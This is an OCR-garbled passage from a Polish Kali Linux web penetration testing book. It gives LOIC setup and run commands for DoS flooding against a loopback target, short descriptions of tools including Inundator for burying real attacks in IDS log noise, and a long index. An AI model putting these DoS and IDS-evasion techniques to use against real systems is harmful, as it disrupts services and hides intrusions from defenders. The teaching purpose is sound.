Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 24: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

